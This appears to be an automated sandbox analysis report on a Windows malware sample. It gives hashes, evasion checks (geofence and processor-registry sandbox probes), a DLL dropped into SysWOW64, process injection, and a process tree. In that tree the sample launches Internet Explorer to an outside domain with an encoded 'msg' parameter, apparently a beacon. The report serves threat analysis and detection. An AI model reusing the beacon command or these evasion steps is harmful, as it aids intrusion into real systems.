Analysis
-
max time kernel
153s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29/12/2023, 22:44
Behavioral task
behavioral1
Sample
05f8cceb91ad96e3fec180ad4fc6c317.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
05f8cceb91ad96e3fec180ad4fc6c317.exe
Resource
win10v2004-20231215-en
General
-
Target
05f8cceb91ad96e3fec180ad4fc6c317.exe
-
Size
158KB
-
MD5
05f8cceb91ad96e3fec180ad4fc6c317
-
SHA1
5ef7ee929bbd7b44b365302391ae2e1fedc04b97
-
SHA256
c26dcbf785274d324bd3d52d5cca862c0b4eb3f8e52ea2d28730f468fc0a61ed
-
SHA512
602e4831a0ef7eece355ce911c2de1382b2e5bde06e3af9eaa23ade68c28bc44d21842e36d1a8b97eb78c08195090318836486b20c7a54809a89192db34a644e
-
SSDEEP
3072:fwABjrG3Vi/cOBLUsmyi4AHhmTdI3wIe0HRDLVT/sOrVzzXZ:oGjrUVecOJUsmdmdI3vPRDLp/s0zJ
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 05f8cceb91ad96e3fec180ad4fc6c317.exe -
resource yara_rule behavioral2/memory/3964-0-0x0000000000400000-0x0000000000435000-memory.dmp upx behavioral2/memory/3964-1-0x0000000000400000-0x0000000000435000-memory.dmp upx behavioral2/memory/3964-2-0x0000000000400000-0x0000000000435000-memory.dmp upx behavioral2/memory/3964-12-0x0000000000400000-0x0000000000435000-memory.dmp upx behavioral2/memory/3964-17-0x0000000000400000-0x0000000000435000-memory.dmp upx -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\efdecdfdcceeabbedb.dll 05f8cceb91ad96e3fec180ad4fc6c317.exe File opened for modification C:\Windows\SysWOW64\RCX2268.tmp 05f8cceb91ad96e3fec180ad4fc6c317.exe File opened for modification C:\Windows\SysWOW64\efdecdfdcceeabbedb.dll 05f8cceb91ad96e3fec180ad4fc6c317.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 05f8cceb91ad96e3fec180ad4fc6c317.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 05f8cceb91ad96e3fec180ad4fc6c317.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 05f8cceb91ad96e3fec180ad4fc6c317.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{2D6EDEA1-A706-11EE-B6AD-EAB06C7B55B6} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4280621793" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31079186" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31079187" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31079186" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4280621793" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "345638000" IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2132 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2132 iexplore.exe 2132 iexplore.exe 4712 IEXPLORE.EXE 4712 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3964 wrote to memory of 3724 3964 05f8cceb91ad96e3fec180ad4fc6c317.exe 93 PID 3964 wrote to memory of 3724 3964 05f8cceb91ad96e3fec180ad4fc6c317.exe 93 PID 3964 wrote to memory of 3724 3964 05f8cceb91ad96e3fec180ad4fc6c317.exe 93 PID 3964 wrote to memory of 2132 3964 05f8cceb91ad96e3fec180ad4fc6c317.exe 99 PID 3964 wrote to memory of 2132 3964 05f8cceb91ad96e3fec180ad4fc6c317.exe 99 PID 2132 wrote to memory of 4712 2132 iexplore.exe 101 PID 2132 wrote to memory of 4712 2132 iexplore.exe 101 PID 2132 wrote to memory of 4712 2132 iexplore.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\05f8cceb91ad96e3fec180ad4fc6c317.exe"C:\Users\Admin\AppData\Local\Temp\05f8cceb91ad96e3fec180ad4fc6c317.exe"1⤵
- Checks computer location settings
- Drops file in System32 directory
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\f3e072290cb0045dcc47ce6aa23776f1.bat2⤵PID:3724
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://wl.cabolar.com/v3062/repins.jpg?msg=vr4m1h4euM9XBMKQxff94jaTxK7ZuQ%2BT%2BkjGD%2FVjSRqUysKPW6VIkics5oniUp9ldsunt43lwIUB9E%2Fy%2FCnbM7Q%2B13dcyHLNRCUblgu1xOBkzuQiLkgtxxIUqlUTwIIk2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2132 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4712
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
209B
MD502b44e60928967f0521022c0863959fc
SHA127e670b44c943892ab00b796f2eb5985b6cf6e3e
SHA2563f2025a624c38be13b3b052eb85326e7237d0cfab644be484e07b1e90b6b312f
SHA512cf53ed2de7439763dd183ecdc3b3bea4db35122a8847baeaa9a69149273b9fa1d97c2882b492e4ed125a499e89925c56f493516dadb8f67ad9d9d79b189ce000